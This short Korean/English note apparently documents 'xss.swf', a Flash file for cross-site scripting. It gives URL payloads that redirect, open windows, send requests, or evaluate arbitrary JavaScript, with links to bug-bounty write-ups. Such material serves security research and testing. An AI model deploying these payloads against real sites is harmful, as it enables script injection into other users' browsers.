Flash SWF을 이용한 XSS

XSS using a Flash SWF

---

xss.zip

a tiny tool for swf hacking, just browse it:)

param&value:

a(action) - c(cmd)

1.location to url: xss.swf?a=location&c=http://www.google.com/ 

2.open url to new window: xss.swf?a=open&c=http://www.google.com/ 

3.http request to url: xss.swf?a=get&c=http://www.google.com/ 

4.eval js codz: xss.swf?a=eval&c=alert(document.domain)

--------------------------------------------------------------------------------

localhost/xss.swf?a=location&c=http://www.google.com/

※ 출처

https://github.com/evilcos/xss.swf

※ 참고자료

http://panchocosil.blogspot.kr/2013/07/swf-file-preview-at-googlegroupscom.html

http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/

http://erlend.oftedal.no/blog/?blogid=99

http://www.exploit-db.com/